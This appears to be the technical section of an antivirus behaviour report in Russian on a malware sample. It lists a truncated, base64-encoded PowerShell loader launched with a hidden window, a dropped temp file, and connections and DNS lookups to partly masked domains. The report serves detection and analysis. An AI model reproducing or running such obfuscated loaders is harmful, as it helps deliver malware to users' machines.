Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABUADMAaABmAHMAOAB5AD0AKAAoACcARwA2ACcAKwAnAHIAJwArACcAMQA0AG0AJwApACsAJwB3ACcAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAEUAbgBWADoAVQBzAEUAcgBwAHIATwBGAEkATABFAFwAbQAzAFkAZg...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1444
- %TEMP%\769958.cvr
- 're######ntprofessional.com':443
- 'ju###tart.store':443
- 're######ntprofessional.com':443
- DNS ASK th###work.com
- DNS ASK re######ntprofessional.com
- DNS ASK wr#####fromling.live
- DNS ASK sh####tubuddin.org
- DNS ASK ju###tart.store
- DNS ASK ai###shirt.com
- DNS ASK ed###ug.store
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABUADMAaABmAHMAOAB5AD0AKAAoACcARwA2ACcAKwAnAHIAJwArACcAMQA0AG0AJwApACsAJwB3ACcAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAEUAbgBWADoAVQBzAEUAcgBwAHIATwBGAEkATABFAFwAbQAzAFkAZg... (со скрытым окном)